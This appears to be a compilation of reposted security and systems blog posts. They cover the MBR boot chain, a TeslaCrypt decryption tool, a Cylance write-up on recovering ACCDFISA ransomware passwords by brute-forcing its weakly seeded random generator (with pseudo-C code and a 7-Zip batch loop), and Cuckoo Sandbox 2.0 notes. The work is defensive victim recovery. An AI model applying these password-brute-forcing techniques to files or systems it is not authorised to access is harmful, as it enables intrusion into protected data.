Original Post: http://anujenater1.blogspot.com/2014/07/bios-vs-uefi.html
Original Post: http://anujenater1.blogspot.com/2014/07/bios-vs-uefi.html
In the diagram below, the boot sequence for all standard computers and operating systems is shown:
As you can see, the boot process is broken down into several major components, each of which is a completely-separate subsystem with many different options and variations. The implementations of each component can differ greatly depending on your hardware and operating system, but the rules they follow and the process by which they work are always the same.
The BIOS is where hardware meets software for the first time, and where all the boot magic begins. The BIOS code is baked into the motherboard of your PC, usually stored on what is called an EEPROM 1 and is considerably hardware-specific. The BIOS is the lowest level of software that interfaces with the hardware as a whole,2 and is the interface by means of which the bootloader and operating system kernel can communicate with and control the hardware. Through standardized calls to the BIOS (“interrupts” in computer parlance), the operating system can trigger the BIOS to read and write to the disk and interface with other hardware components.
When your PC is first powered up, a lot happens. Electrical components of the PC are initially responsible for bringing your computer to life, as debouncing circuits take your push of the power button and trigger a switch that activates the power supply and directs current from the PSU to the motherboard and, mainly through it, to all the various components of your PC. As each individual component receives life-giving electricity, it is powered up and brought online to its initial state. The startup routines and overall functionality of the simpler components like the RAM and PSU is hardwired into them as a series of logic circuits (AND/NAND and OR/NOR gates), while more complicated parts such as the video card have their own microcontrollers that act as mini-CPUs, controlling the hardware and interfacing with the rest of your PC to delegate and oversee the work.
Once your PC has been powered on, the BIOS begins its work as part of the POST (Power-On Self Test) process. It bridges all the various parts of your PC together, and interfaces between them as required, setting up your video display to accept basic VGA and show it on the screen, initializing the memory banks and giving your CPU access to all the hardware. It scans the IO buses for attached hardware, and identifies and maps access to the hard disks you have connected to your PC. The BIOS on newer motherboards is smart enough to even recognize and identify USB devices, such as external drives and USB mice, letting you boot from USB sticks and use your mouse in legacy software.
During the POST procedure, quick tests are conducted where possible, and errors caused by incompatible hardware, disconnected devices, or failing components are often caught. It’s the BIOS that’s responsible for a variety of error messages such as “keyboard error or no keyboard present” or warnings about mismatched/unrecognized memory. At this point, the majority of the BIOS’ work has completed and it’s almost ready to move on to the next stage of the boot process. The only thing left is to run what are called “Add-On ROMs”: some hardware attached to the motherboard might require user intervention to complete its initialization and the BIOS actually hands off control of the entire PC to software routines coded into hardware like the video card or RAID controllers. They assume control of the computer and its display, and let you do things like set up RAID arrays or configure display settings before the PC has even truly finished powering up. When they’re done executing, they pass control of the computer back to the BIOS and and the PC enters a basic, usable state and is ready to begin.
After having configured the basic input and output devices of your PC, the BIOS now enters the final stages where it’s still in control of your computer. At this point, you’ll normally be presented with an option to quickly hit a key to enter the BIOS setup from where you can configure hardware settings and control how your PC boots. If you choose nothing, the BIOS will begin the first step in actually “booting” your PC using the default settings.
Earlier we mentioned that an important part of the BIOS’ work is to detect and map connected hard disks. This list now comes in handy, as the BIOS will load a very small program from the first hard disk to the memory and tell the CPU to execute its contents, handing off control of the computer to whatever is on the hard drive and ending its active role in loading your PC. This hard drive is known as “the boot device,” “startup disk,” or “drive 0” and can usually be picked or set in the BIOS setup.
Regardless of whether the BIOS was configured to boot from a local hard disk or from a removable USB stick, the handoff sequence is the same. Once the BIOS POST and AddOn ROM procedures have completed, the BIOS loads the first 512 bytes from the hard drive of the selected boot device – these 512 bytes are what is commonly known as the MBR, or the Master Boot Record.
The MBR is the first and most important component on the software side of things in the boot procedure on BIOS-based machines. Every hard disk has an MBR, and it contains several important pieces of information.
First and foremost, the MBR contains something called the partition table, which is an index of up to four partitions that exist on the same disk, a table of contents, if you will. Without it (such as on floppy disks), the entire disk could only contain one partition, which means that you can’t have things like different filesystems on the same drive, which in turn would mean you could never install Linux and Windows on the same disk, for example.
Secondly, the MBR also contains a very important bit of code known as the “bootstrap code.” The first 4403 of these 512 bytes can contain literally anything – the BIOS will load it and execute its contents as-is, kicking off the bootloader procedure. 440 bytes is incredibly small. How small? Well, to put things in context, 440 bytes is only 0.3% of the capacity of an ancient 1.44 MiB floppy disk – barely enough to fit any form of useful code – and way, way too small to do something as complicated as call up the operating system kernel from the disk.
Given how tiny the bootstrap code section of the MBR is, the only useful purpose it can really serve is to look up another file from the disk and load it to perform the actual boot process. As such, this bootstrap code is often termed a “stage one bootloader.” Depending on the operating system, the exact place the bootstrap code searches for the “stage 2 bootloader” can change, but on Windows the stage 1 bootloader will search the partition table of the MBR for a partition marked as “active” which is MBR-speak for “bootable,” indicating that the start of the partition contains the next portion of the boot code in its starting sectors (also known as its “bootsector”). On a correctly-created MBR disk, only one partition can be marked as active at a time.4
So the job of the bootstrap code segment in the MBR is pretty simple: look up the active partition from the partition table, and load that code into the memory for execution by the CPU as the next link in the boot chain. Depending on the OS you’re loading, it might actually look up a hard-coded partition instead of the active partition (e.g. always load the bootsector of the 3rd partition) and the offset of the boot code within the partition bootsector might change (e.g. instead of being the first 2 KiB of the partition, it might be the second KiB or 6 KiB starting from the 2nd multiple of the current phase of the moon) – but the basic concept remains the same. However, for legacy compatibility reasons, the MBR almost always loads the first sector of the active partition, meaning another only-512 bytes.
On IBM-compatible PCs (basically, everything) the final two bytes of the 512-byte MBR are called the boot signature and are used by the BIOS to determine if the selected boot drive is actually bootable or not. On a disk that contains valid bootstrap code, the last two bytes of the MBR should always be 0x55 0xAA.5If the last two bytes of the MBR do not equal 0x55 and 0xAA respectively, the BIOS will assume that the disk is not bootable and is not a valid boot option – in this case, it will fall back to the next device in the boot order list (as configured in the BIOS setup). For example, if the first boot device in the BIOS is set as the USB stick and the second is the local hard disk, if a USB stick without the correct boot signature is plugged in, the BIOS will skip it and move on to attempt to load from the local disk. If no disk in the boot device list has the correct 0x55 0xAA boot signature, the BIOS will then display an error such as the infamous “No boot device is available” or “Reboot and select proper boot device.”
As covered above, the bootstrap code in the MBR will usually load a sequence of bytes from the start of the active partition. The exact layout of a partition depends what filesystem the partition has been created or formatted with, but generally looks something like this:
Again, depending on the OS and filesystem, the exact layout of the partition will certainly differ. But this represents a close approximation to what you’ll normally see:
This is all usually packed into the first sector of the partition, which is normally again only 512 bytes long, and again, can’t fit too much data or instructions. On modern filesystems for newer operating systems, the bootstrap code can take advantage of enhanced BIOS functionality to read and execute more than just 512 bytes, but in all cases, the basic steps remain the same:
The bootstrap code in the partition is not the end of the road, it’s only another step along the way. Because of how little space is allocated for the bootstrap code in the partition bootsector, the code it contains normally ends with another JMP command instructing the CPU to jump to the next sector in the partition, which is often set aside for the remainder of the partition code. Depending on the filesystem, this can be several sectors in length, or however long it needs to be to fit this stage of the bootloader.
The second stage of the bootloader, stored in the partition bootsector in the bootstrap section and, optionally, continuing beyond it, carries out the next step in the bootloader process: it looks up a file stored on the partition itself (as a regular file), and tells the CPU to execute its contents to begin the final part of the boot process.
Unlike the previous bootstrap segments of the MBR and the partition bootsector, the next step in the boot process is not stored at a dedicated offset within the partition (i.e. the bootstrap code can’t just tell the CPU to JMP to location 0xABC and execute the boot file from there) – it’s a normal file stored amongst other normal files in the filesystem on the disk.
This significantly more-complicated bootstrap code must actually read the table-of-contents for the filesystem on the partition,7 The second-stage bootloader from older versions of file systems oftentimes placed complicated restrictions on the bootloader files they needed to load, such as requiring them to appear in the first several kilobytes of the partition or being unable to load non-contiguously allocated files on the partition. This file is the last piece of the bootloader puzzle, and there are usually no restrictions as to its size or contents, meaning it can be as large and as complicated as it needs to be to load the operating system kernel from the disk and pass on control of the PC to the OS.
The actual bootloader files on the disk form the final parts of the boot loading process. When people talk about bootloaders and boot files, they are often referring to this final, critical step of the boot process.
Once control of the PC has been handed-off from the BIOS to the bootstrap code in the MBR and from the MBR to the bootstrap code in the partition bootsector, and from there there to the executable boot files on the active partition, the actual logic involved in determining which operating system to load, where to load it from, which parameters/options to pass on to it, and completing any interactions with the user that might be available, the actual process of starting the operating system begins.
While the executable bootloader files could theoretically contain hard-coded information pertaining to the operating systems to be loaded from the disk, that wouldn’t be very useful at all. As such, almost all bootloaders separate the actual, executable bootloader from the configuration file or database that contains information about the operating system(s) to load. All of the major bootloaders mentioned below have support for loading multiple operating systems, a process known as “dual-booting” or “multi-booting.”
As discussed previously, there are many different bootloaders out there. Each operating system has its own bootloader, specifically designed to read its filesystem and locate the kernel that needs to be loaded for the OS to run. Here are some of the more-popular bootloaders – and their essential configuration files – for some of the common operating systems:
Each of the popular operating systems has its own default bootloader. Windows NT, 2000, and XP as well as Windows Server 2000 and Windows Server 2003 use the NTLDR bootloader. Windows Vista introduced the BOOTMGR bootloader, currently used by Windows Vista, 7, 8, and 10, as well as Windows Server 2008 and 2012. While a number of different bootloaders have existed for Linux over the years, the two predominant bootloaders were Lilo and GRUB, but now most Linux distributions have coalesced around the all-powerful GRUB2 bootloader.
NTLDR is the old Windows bootloader, first used in Windows NT (hence the “NT” in “NTLDR,” short for “NT Loader”), and currently used in Windows NT, Windows 2000, Windows XP, and Windows Server 2003.
NTLDR stores its boot configuration in a simple, text-based file called BOOT.INI, stored in the root directory of the active partition (often C:\Boot.ini). Once NTLDR is loaded and executed by the second-stage bootloader, it executes a helper program called NTDETECT.COM that identifies hardware and generates an index of information about the system. More information about NTLDR, BOOT.INI, and NTDETECT.COM can be found in the linked articles in our knowledgebase.
BOOTMGR is the newer version of the bootloader used by Microsoft Windows, and it was first introduced in the beta versions of Windows Vista (then Windows Codename Longhorn). It’s currently used in Windows Vista, Windows 7, Windows 8, Windows 8.1, and Windows 10, as well as Windows Server 2008 and Windows Server 2012.
BOOTMGR marked a significant departure from NTLDR. It is a self-contained bootloader with many more options, especially designed to be compatible with newer functionality in modern operating systems and designed with EFI and GPT in mind (though only certain versions of BOOTMGR support loading Windows from a GPT disk or in a UEFI/EFI configuration). Unlike NTLDR, BOOTMGR stores its configuration in a file called the BCD – short for Boot Configuration Database. Unlike BOOT.INI, the BCD file is a binary database that cannot be opened and edited by hand.8 Instead, specifically designed command-line tools like bcdedit.exe and more user-friendly GUI utilities such asEasyBCD must be used to read and modify the list of operating systems.
GRUB was the predominantly-used bootloader for Linux in the 1990s and early 2000s, designed to load not just Linux, but any operating system implementing the open multiboot specification for its kernel. GRUB’s configuration file containing a whitespace-formatted list of operating systems was often called menu.lst or grub.lst, and found under the /boot/ or /boot/grub/ directory. As these values could be changed by recompiling GRUB with different options, different Linux distributions had this file located under different names in different directories.
While GRUB eventually won out over Lilo and eLilo, it was replaced with GRUB 2 around 2002, and the old GRUB was officially renamed “Legacy GRUB.” Confusingly, GRUB 2 is now officially called GRUB, while the old GRUB has officially been relegated to the name of “Legacy GRUB,” but you’ll thankfully find most resources online referring to the newer incarnation of the GRUB bootloader as GRUB 2.
GRUB 2 is a powerful, modular bootloader more akin to an operating system than a bootloader. It can load dozens of different operating systems, and supports custom plugins (“modules”) to introduce more functionality and support complex boot procedures.
The actual bootloader file for GRUB 2 is not a file called GRUB2, but rather a file usually called core.img. Unlike Legacy GRUB, the GRUB 2 configuration file is more of a script and less of traditional configuration file. The grub.cfg file, normally located at /boot/grub/grub.cfg on the boot partition, bears resemblance to shell scripts and supports advanced concepts like functions. The core functionality of GRUB 2 is supplemented with modules, normally found in a subdirectory of the /boot/grub/ directory.
As previously mentioned, the stage of the boot process is a little more involved than the previous steps, primarily due to the additional complexity of reading the filesystem. The bootloader must also obtain information about the underlying machine hardware (either via the BIOS or on its own) in order to correctly load the desired operating system from the correct partition and provide any additional files or data that might be needed. It must also read its own configuration file from a regular file stored on the boot partition’s filesystem, so it needs to at the very least have full read support for whatever filesystem it resides on.
Thus ends the lengthy journey that begins with the push of a button and ends with an operating system’s kernel loaded into the memory and executed. The bootloader process is certainly a lot more nuanced and complicated than most realize, and it has both been designed and evolved to work in a fairly-standardized fashion across different platforms and under a variety of operating systems.
The individual components of the bootloader are, by and large, self-sufficient and self-contained. They can be swapped out individually without affecting the whole, meaning you can add disks and boot from different devices without worrying about upsetting existing configurations and operating systems. It also means that instead of having one, single bit of hardware/software to configure, setup, maintain, and debug, you instead are left with a intricate and oftentimes very fragile chain with multiple points susceptible to breakage and failure. When working properly, the boot process is a well-oiled machine, but when disaster strikes, it can be a very difficult process to understand and debug.
Original Post: https://neosmart.net/wiki/mbr-boot-process/
TeslaCrypt is one of the most insidious ransomware first detected in the wild in 2015, today I have a good news for its victims.
TeslaCrypt was first detected in February 2015, the ransomware was able to encrypt user data including files associated with video games. In July, a new variant appeared in the wild, TeslaCrypt 2.0, the authors improved the encryption mechanism.
Both strains of the ransomware, TeslaCrypt and TeslaCrypt 2.0, are affected by a security flaw that has been exploited by security experts to develop a free file decryption tool.
The design issue affects the encryption key storage algorithm, the vulnerability has been fixed with the new release TeslaCrypt 3.0 which was improved in a significant way.
The security expert Lawrence Abrams published an interesting blog post detailing the issue, confirming that the decryption tool was available for a while but the news was not disclosed to avoid countermeasures of the malware developers.
Unfortunately, TeslaCrypt 3.0 resolves the issue, then research community decided to release decryption tools in the wild (i.e. TeslaCrack (https://github.com/Googulator/TeslaCrack).
“For a little over a month, researchers and previous victims have been quietly helping TeslaCrypt victims get their files back using a flaw in the TeslaCrypt’s encryption key storage algorithm. The information that the ransomware could be decrypted was being kept quiet so that that the malware developer would not learn about it and fix the flaw. Since the recently released TeslaCrypt 3.0 has fixed this flaw, we have decided to publish the information on how a victim could generate the decryption key for encrypted TeslaCrypt files that have theextensions .ECC, .EZZ, .EXX, .XYZ, .ZZZ,.AAA, .ABC, .CCC, and .VVV. Unfortunately, it is currently not possible to decrypt the newer versions of TeslaCrypt that utilize the .TTT, .XXX, and .MICRO extensions.”wrote Abrams.
As explained in the post, files encrypted with the newer versions of TeslaCrypt are recognizable by the extension (.TTT, .XXX, and .MICRO) and cannot be decrypted.
TeslaCrypt encrypts files with the AES encryption algorithm and uses the same key for both encryption and decryption. Abrams explained that the threat generated a new AES key each time it was restarted, and that it stored the key in the files encrypted during the session. The information about the encrypted key was stored in each encrypted file, fortunately the size of this stored key was vulnerable to decryption through specialized programs. These programs are able to factorize these large numbers, extract their prime numbers and pass them to other specialized tools used to reconstruct the decryption key.
Another interesting tool for decrypting the files is TeslaDecoder, it has been available for decrypting TeslaCrypt files since May 2015 and it has been updated to recover the encryption key for all TeslaCrypt variants.
If you are one of the numerous victims of the TeslaCrypt ransomware, now you can recover your files using TeslaCracker or TeslaDecoder.
Original Post: http://securityaffairs.co/wordpress/43926/cyber-crime/teslacrypt-decryption-tool.html
In early 2013, an organization approached Cylance for help recovering from a devastating ransomware attack that made it impossible to access large numbers of critical files. The attacker used a version of the “Anti-Child Porn Spam Protection” ransomware, which combed every drive it could find and encrypted critical files. The backup drives were mounted when the attack hit, so they faced a total data loss. Fortunately we were able to derive the password used to encrypt that data and commence recovery. This blog presents the technical story behind the work we did to crack that code.
We have held off on going public out of concern that releasing this data could prompt the ransomware authors to identify methods for better securing their passwords. There is plenty of evidence that malware developers follow the work of security firms. For example, a few months after we cracked this case, another firm publicly announced that they could recover files encrypted by the same ransomware. Although the firm did not publish details, it appears that the malware authors took the announcement seriously enough to take countermeasures. A new version of the ransomware soon appeared that was no longer susceptible to the same password-guessing technique. The authors even professed explicit knowledge of the weak password-generation flaw in comments inserted in the malware. We presented at Black Hat USA in 2013 on attacking pseudorandom number generators, but this is the first time we have discussed how we cracked the ransomware.
We encourage other researchers to exercise discretion when they discover a correctable flaw in ransomware. Work privately with trusted agencies and organizations that victims are likely to contact, so that the ransomware remains flawed and its victims can be helped for as long as possible.
(Editor’s note: A shorter version of this report appeared last month on the RSA Conference Blog.)
Earlier ransomware specimens from the same family, commonly called ACCDFISA, were defeated by researchers who exploited mistakes or oversights by the ransomware’s developer. The version we faced seemed to have been improved by the experience. It claimed to use AES-256 encryption with a 256-character random key generated individually for each victim and communicated back to the attacker. It also claimed to securely delete files to prevent recovery of any unencrypted original files or passwords. Those claims demonstrated an awareness of how a naive ransomware attack could be beaten, suggesting that correct technical countermeasures had been taken to dash any hopes of recovery. Had the ransomware author finally gotten everything right?
We examined one of the victim’s encrypted files, which was renamed with the instructions “(!! to decrypt email id … to …@… !!).exe.” The file was a WinRAR self-extractor containing an encrypted RAR. Finding a flaw in WinRAR’s cryptographic implementation didn’t seem a promising approach, so instead we decided to crack the password. To do that we needed the code that created it.
We found the malware and a number of files that seemed to be associated with it on the infected drive. One file was Microsoft Sysinternals’ sdelete utility, which permanently deletes files and which we also didn’t imagine would contain a bug that would lead us to a quick victory. We also found a “NoSafeMode” library and a RAR utility for making self-extractors. The presence of these files suggested that the attackers had created a Frankenstein’s monster of stolen code, crudely sewn together with a main ransomware executable that appeared to be written in PureBasic. The RAR utility gave us a place to start reverse engineering the ransomware. The utility accepts the encryption key password as a command-line argument, so we reasoned that backtracking from the point in the ransomware code that launches the utility would lead us to the place where the password is constructed.
We started by running the ransomware on a disposable system. We attached a debugger and intercepted the CreateProcess calls that launch the RAR utility to encrypt our files. With a little effort, the debugger broke and we were able to view the full command line, which includes the password in the “-hp” switch.
This test run gave us a password. It was not necessarily the password used to encrypt the victim’s files, but it gave us some clues to guide our reverse-engineering effort: We could look for the password or pieces of it, we could search for the likely “alphabet” used to generate the password if it is random, and we could search for the “-hp” string used to build the password portion of the command line.
The intercepted password appeared to be a 57 character mixture of letters, digits and punctuation marks. It was too random to have been keyed in by a human and had “aes” in the prefix. This latter feature could just be a coincidence, like spotting a meaningful word or number on a license plate, or it could be an intentional prefix which turns up as a hard-coded string in the ransomware code. In fact, when we open the ransomware in a disassembler, we found not just an “aes” string, but the full “aesT322” prefix:
This told us that the password is actually “aesT322” followed by 50 presumably random characters.
In the screenshot above, the partially highlighted instruction is where the program loads a reference to the “aesT322” string. We guessed that the next instruction loads a reference to some global variable where that string will be stored. We’ve already named the variable “PasswordPrefix”, but it was easy to double-check that assertion. First we located where that variable resides in memory.
This portion of the ransomware’s data section contains some global variables involved in random password generation. Like before, we’ve renamed and commented on some of the variables.
With the addresses of the variables, we returned to the debugger to see what values they held during our live test run. Here’s what we found:
While the disassembler lets us easily browse the ransomware’s code as a static or “dead” program on disk, the debugger enables us to pick through the memory of a “live” ransomware process as its running. Here, we can view the values taken by three string variables.
Just as we had expected, the variable named “PasswordPrefix” pointed to a copy of the “aesT322” prefix string. “PasswordRandom” pointed to a string of 50 random characters and “PasswordFull” pointed to a string comprising the two parts concatenated.
We then validated our findings and methodology by revisiting the third approach, tracking down the “-hp” string. Back in the disassembler, a very quick search led to one of a few instances:
We understood more about the ransomware but were still not sure if we could help the victim. We had ruled out the possibility that the password might be the same for all victims. Fortunately, the disassembler makes it easy to find every place a variable is accessed, so we could backtrack to the code where “PasswordFull” is constructed:
This code builds “PasswordFull” by concatenating “aesT322” with the random string.
Next, we followed cross-references to “PasswordRandom.”
We found a loop that counts from 1 to 50, which matches the 50-character length of the password’s random portion. Inside the loop we found a string that looked like an “alphabet” from which the 50 characters would be randomly chosen. The alphabet included 26 lowercase letters, 26 uppercase letters, 10 digits, and 16 punctuation symbols.
The next step was to figure out which function (from the subroutines called inside the loop) selects a random character. Despite popular belief, computers struggle to be truly random; attacking what’s often and more appropriately referred to as the pseudorandom number generator has long been a fruitful approach to defeating encryption. We labeled the function “_get_random_Alphabet_char” above. The function disassembles as follows:
That disassembly was fairly easy reading after we determined that the highlighted function is “Rnd” (PureBasic’s random number generating function). This is what the function looks like inside:
The “Rnd” function wraps calls to even more functions, which we named. The function “_internal_Randomize_default” calls a few Windows functions, as well as a function internal to the ransomware that we’ve named “_internal_RandomInit.” The following screenshot displays side-by-side disassemblies of both.
We finally had a breakthrough. On the left, we see that the PRNG is initialized, or seeded, with a 32-bit number derived from the identifier of the thread executing this code and how long the system has been running in milliseconds, both rather predictable values. On the right, we’ve highlighted a “magic” constant–a special-purpose number that typically lends itself to an Internet search. The number appears here in hexadecimal as 53A9B4FBh, although other likely representations include 0x53A9B4FB or the decimal representation 1403630843. The instructions that follow it can be translated to the expression “1 – EAX * 0x53A9B4FB,” meaning the constant we see may actually be the negation -1403630843, which could be represented AC564B05h, 0xAC564B05, or 2891336453 if treated as unsigned. Searching the Internet for these various terms eventually led to source code ostensibly related to random number generators, as well as a disassembly posted in a PureBasic forum.
Below, the disassembly of the purported “Rnd” function further corroborated our findings with its prominent rotate operations, which have counterparts in the source code we found online.
This is where things got exciting. Thanks to the 32-bit seed, we knew there could be at most 4 billion possible passwords, not the nonillions of nonillions of possibilities that 50 characters picked truly randomly from an alphabet of 78 would yield. This is because, as noted before, computers usually operate with rigid determinism even when they’re trying to act random. For any given seed value, the PRNG will produce the exact same numbers in the exact same order any time it’s initialized with that value. Since the seed is a 32-bit number, it can range from zero to about 4 billion, and therefore the realm of possible initial states is equally confined.
Of course, a list of 4 billion passwords is no trifling thing. In this case, we’re greatly assisted by the choice of seed sources–a thread ID and the system uptime. The former is a multiple of 4 and typically less than 10,000, while the latter is more variable. Over the course of 49.7 days, the uptime will count from zero to 4 billion and then wrap around to become zero again, typically counting by 15 or 16 as it goes. If we can catch a hint of how long the victimized system had been running prior to the attack, we can greatly narrow down the possible values of the uptime component of the seed and accordingly the number of passwords to try.
The problem with guessing passwords is that it’s expensive in terms of time. Generating a password from a given seed is very fast, but in the quick-and-dirty system we threw together, we could only test a guess by attempting to decrypt the RAR and checking if anything sensible came out, a comparatively costly operation especially when attempted millions of times. As it turns out, we didn’t find a record of when the victim’s computer had started last, but on the way we discovered something even better.
One of the first things we noticed when examining the infected drive was a variety of strange files stashed in the “\ProgramData” folder, under hidden subdirectories of various randomly-lettered names. We also found a text file, “\ProgramData\svcfnmainstvestvs\stppthmainfv.dll”, containing 21 lines of eight random letters each. With further scrutiny, we realized that each line was the reverse of a random subdirectory or file name also created by the ransomware under “\ProgramData”.
The value of this data isn’t that we need a list of names–its value is that it represents output from the PRNG that gets left behind after an infection. In the case of a real infection, like the one we were called in to resolve, we of course wouldn’t have captured the password like we did in our test run, but chances are good we could still find “stppthmainfv.dll” or reconstruct it based on what’s in the infected drive’s “\ProgramData” directory. With this data, we can simply brute-force all possible seed values–all the way to four billion if needed–and figure out which value was used to seed the PRNG before it cranked out all these random names. The search should take no more than a few hours on a reasonable computer, making it orders of magnitude faster than feeding guessed passwords to a RAR utility.
There are a few catches though. First, as suggested by the Thread Local Storage (TLS) calls spotted in the random functions, each thread has its own PRNG state, initialized independently the first time “Rnd” is called. It so happens that the random eight-letter names are generated on the ransomware process’s main thread, while the password is decided on a second thread. The following code is the loop where the 21 names are generated; the code cross-reference (“CODE XREF”) comments, in green, indicate that the code resides in the program’s “start” function, which runs on the process’s first thread.
This loop, in the ransomware’s “start” function, creates the 21 random file and subdirectory names.
This is the loop in the function annotated above that chooses the eight random letters from a regular A-to-Z alphabet. As expected, the function calls “Rnd” once per letter.
The password-generation code, on the other hand, we traced to a function tagged “sub_406582”, which is called by a function we named “_ServiceMain”, which Windows executes on a separate thread when the ransomware runs as a Windows service. This means that the two code regions of interest will execute with separate PRNG states, each seeded by a different value. Brute-forcing the seed value that gave the random names won’t directly give us the password seed value, although it should put is in the neighborhood, owing to the simplicity and predictability of its bases. Put another way, the seed values will differ in both the system uptime and thread ID components, since the threads start at different times and necessarily must have different IDs if they run concurrently, but they won’t differ by much. With the first seed value in hand, we can conservatively narrow the possibilities for the second to perhaps a range of a few hundred thousand.
A second catch, easily overlooked, is that we have a sequence of letters, but the PRNG technically issues a sequence of numbers. In this case, as depicted in the preceding screenshot, numbers from 0 to 25 straightforwardly represent the letters “a” through “z”, so the intuitive alphabet mapping letters to numbers is the correct one. In other cases, however, letters could have been omitted, duplicated, reordered, or interspersed with other characters that we didn’t happen to see in “stppthmainfv.dll”, any of which could have meant wasted hours of misguided brute-forcing attempts if we hadn’t been paying attention.
A third complication is that there’s no guarantee that the PRNG is being seeded immediately before the ransomware generates the names or password. Other calls to “Rnd” could take place earlier in either or both threads, meaning that the PRNG’s state wouldn’t be the pristine seeded state when the random generation code in question executes. We needed to figure out how many times “Rnd” is called in each thread prior to the calls we care about, and discard that many random numbers before generating our own speculative names or passwords.
So let’s look for “Rnd” calls. Scrolling up a bit in the disassembly, we see only one call to “Rnd” in the “start” function, shown here:
The first call to “Rnd” executed by the ransomware, and the only call made before the file and subdirectory name-generation loop.
On the other hand, the “_ServiceMain” thread which executes the password generation code calls “Rnd” three times before it uses the PRNG to construct the password, as depicted below.
Three calls to “Rnd” precede the password generation code on the “_ServiceMain” thread.
These three calls mean that, once we’re ready to start generating candidate passwords, we’d better discard the first three random numbers after each seeding.
Finally, we were ready to begin brute-forcing. Our program for finding the names seed value looked something like this: (We’ve omitted the PureBasic PRNG reimplementation for brevity.)
for (unsigned int seed = 0; ; seed++)
// seed the PRNG with a possible value
// discard one random number
for (i = 0; i < 21 * 8; i++)
// generate the next random letter
// Rnd(25): from 0 to 25 inclusive
char ch = “abcdefghijklmnopqrstuvwxyz”[Rnd(25)];
// does this letter match the next in the sequence?
if (ch != “chlqfohkayfwicdd…dszeljdp”[i])
// did we complete the entire sequence?
if (i == 21 * 8)
// yes, display the result and finish
printf(“Names seed = %u\n”, seed);
// no, try the next seed value
In about 4 seconds on a single CPU core, the code tested 31,956,209 possibilities and found that the last one–seed value 31,956,208–generated the same sequence of letters as observed in “stppthmainfv.dll”. Obtaining that one number validated all of our work up to that point.
The system we devised for turning this information into results was considerably less elegant, but at that point we figured any working prototype would do. Taking a mostly wild guess, we assumed that the seed value responsible for generating the password would be no further than 32,768 below or 180,000 (3 minutes in milliseconds) above the names seed value we just recovered. Accordingly, we generated a list of approximately 200,000 passwords based on the possible seed values in that range, using code like the following:
// this is the names seed value we brute-forced earlier
unsigned int namesseed = 31956208;
// loop through a range of seed values around the determined names seed value
for (unsigned int seed = namesseed – 32768; seed <= namesseed + 180000; seed++)
// seed the PRNG with a candidate password seed value
// discard three random numbers
pwrandom = ‘\0’;
// generate the fifty-char random portion of the password corresponding to
// the candidate seed value, using the alphabet extracted from the ransomware
// Rnd(77): from 0 to 77 inclusive (this alphabet contains 78 characters)
for (size_t i = 0; i < 50; i++)
pwrandom[i] = “abc…xyzABC…XYZ0123456789!@#$%^&*&*()-+_=”[Rnd(77)];;
// output the full password; this output can be captured to compile a list
Running this code with its output redirected into a text file gave us a roughly 12MB list of passwords to test, which compares very favorably to the 236GB text file we would need to hold all 4 billion possibilities if we hadn’t been able to narrow down the password seed value. With the list in hand, we cobbled together a crude batch file to run the free archive utility 7-Zip against an encrypted RAR self-extractor, testing in sequence each password in the list. 7-Zip seemed to experience some false positives when detecting a successful decryption, so we used “find” to search for output that was very likely to appear if and only if the file decrypted into something sensible. Here’s what the batch file looked like:
@for /f %%p in (pwlist.txt) do @(
7z.exe l “testtargetfile_0123456789abcdef.docx(!! to decrypt email id … to … !!).exe” “-p%%p” 2>&1 |find “..”
if NOT ERRORLEVEL 1 (echo “%%p”)
We let the batch file run overnight, and by morning it had finished with exactly one password waiting for us on the screen–the correct password. Our experiment was a success! We had earned the victim’s faith in us, and at last, we were ready to get their data back.
Original Post: http://blog.cylance.com/cracking-ransomware
The time has come for a new release of Cuckoo Sandbox, version 2.0 RC1. This release is just shy of 10 months since our 1.2 release, but the development for the 2.0 release had already started over one and a half year ago.
Because we consider Cuckoo Sandbox 2.0 to be our largest release yet, and because a number of features are still in an alpha or beta stage, we decided to initiate the release process with a Release Candidate, number 1. In practice this means that users will be seeing a couple more Release Candidates in the upcoming months before we hit 2.0 stable, and through this process we’ll be able to identify and fix bugs, extend the existing features and complete the ones that have been left awaiting. In other words, we invite our users to check this version out, use it and test it, and help us getting closer to hit 2.0 faster. Please notice: as mentioned, a few features are incomplete, and some have broken in the process (e.g. web interface’s seach), so be aware before deploying this version in any production environment.
In this blog post we will go through the details of some of the most interesting new additions to Cuckoo Sandbox 2.0-rc1, but for those who get bored quickly, here’s a short list of what has been introduced in this release:
This is just one example of what the new analysis instrumentation can achieve. We will get more in depth on many of the new freatures introduced by it in following blog posts.
As part of GSoC 2015 (Google Summer of Code) Dmitry Rodionov build a wonderful Mac OS X Analyzer for Cuckoo Sandbox. As OS X analysis depends on having a functional OS X virtual machine, you will either have to run Mac OS X as a host system, or alternatively use a Hackintosh VM. Please be aware that that might be a breach of Apple’s Terms of Service. We take no responsibility.
The OS X Analyzer is based on DTrace, a powerful dynamic tracing framework built right into the OS X kernel, which is capable of tracing user-land processes as well as in-kernel activity DTrace comes with its own scripting language (which is basically a subset of C), and in order to facilitate the configuration process, the analyzer comes with a DTrace code generator based on a precompiled list of API of interest.
In the meantime Mark Schloesser has been focusing his efforts on providing Cuckoo with proper Linux analysis. Using a couple of slick SystemTap scripts Cuckoo has learned how to properly analyze the latest samples that were dropped as part of Shellshock and ElasticSearch exploit rounds.
In theory Linux analysis is pretty simple – just trace syscalls executed by the target binary and its child processes. There are a few existing projects such as Sysdig, LTTNG and SystemTap that allow us to do this and they mostly make use of kernel mainline tracing subsystems in order to monitor the kernel. Sadly we start to run into issues when we want to cover multiple architectures. Some approach works on x86, some on x64, some on both. It’s an even bigger problem when you extend to ARM, MIPS and other platforms. In addition some malware requires a specific environment, for example when they target embedded devices. We looked at malware that needs an OpenWRT environment and were able to prepare that in Cuckoo and analyze the malware.
In the end the current Linux analyzer now uses SystemTap, which is not our most favorite design, but it worked relatively well across all platforms. In order to run the non-native platforms we implemented a QEMU machinery module, but the x86/x64 analysis can also be done with VirtualBox / KVM / etc. The VM needs to run our Python agent as always and for system call traces it would need SystemTap or at least the “staprun” tool together with a precompiled SystemTap kernel module. The analyzer can also fall back to strace, but that has shown to lose track of child processes and we also did not implement a parser for its output. For SystemTap traces we parse the output and thus can display it exactly like the Windows API logs in the webinterface.
There are quite a few areas that could be improved about this Linux implementation – but it’s simple and works for most of the samples we looked at.
Now covering most major platforms for analysis naturally Android could not stay behind. Thanks to a lot of work from Idan Revivo the Cuckoo team has been able to integrate Android analysis. Idan still actively maintains his original version of Cuckoo with Android analysis, also known as Cuckoo Droid, adding new signatures for interesting samples as new malicious Android samples are found.
